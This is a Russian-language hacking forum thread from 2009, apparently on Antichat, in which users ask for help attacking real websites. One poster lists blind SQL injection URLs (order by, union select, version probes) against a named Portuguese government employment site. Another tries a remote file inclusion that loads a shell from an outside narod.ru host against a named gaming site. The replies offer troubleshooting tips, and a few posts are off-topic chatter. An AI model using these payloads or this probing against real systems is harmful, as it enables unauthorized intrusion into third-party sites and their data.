26.03.2009, 15:30
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Нашёл блинд инж, подобрал поля
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--
так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
|
|
|
26.03.2009, 15:59
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 1
Провел на форуме:
4317
Репутация:
0
|
|
Сообщение от Imperou$
Нашёл блинд инж, подобрал поля
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--
так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
А почему ты решил что это вообще MySQL?.
|
|
|
|
26.03.2009, 16:41
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Сообщение от Booblekus
А почему ты решил что это вообще MySQL?.
А почему ты спрашиваешь?Посты набиваешь?
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--
и
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+3--
и
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2
Догадайся почему.
З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD
Соответственно блинд,разве нет?
|
|
|
|
25.03.2009, 17:46
|
|
Участник форума
Регистрация: 30.07.2006
Сообщений: 148
Провел на форуме:
789961
Репутация:
215
|
|
Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то
чо тако ??
|
|
|
|
25.03.2009, 18:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!
|
|
|
|
25.03.2009, 18:16
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch
Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell
и вот так
http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php
Выводится пустая страница. В чем моя ошибка?
|
|
|
|
25.03.2009, 18:24
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от ПаВлУшКа
Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch
Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell
и вот так
http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php
Выводится пустая страница. В чем моя ошибка?
с чего ты взял что там php injection?
Последний раз редактировалось z00MAN; 25.03.2009 в 18:43..
|
|
|
|
25.03.2009, 18:26
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
|
|
|
|
25.03.2009, 18:31
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от ПаВлУшКа
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
не обязательно если выходит ошибка при "page=blalbabla" то есть php injection
Последний раз редактировалось z00MAN; 25.03.2009 в 18:42..
|
|
|
|
25.03.2009, 20:43
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от ПаВлУшКа
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
Что за ошибка то?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
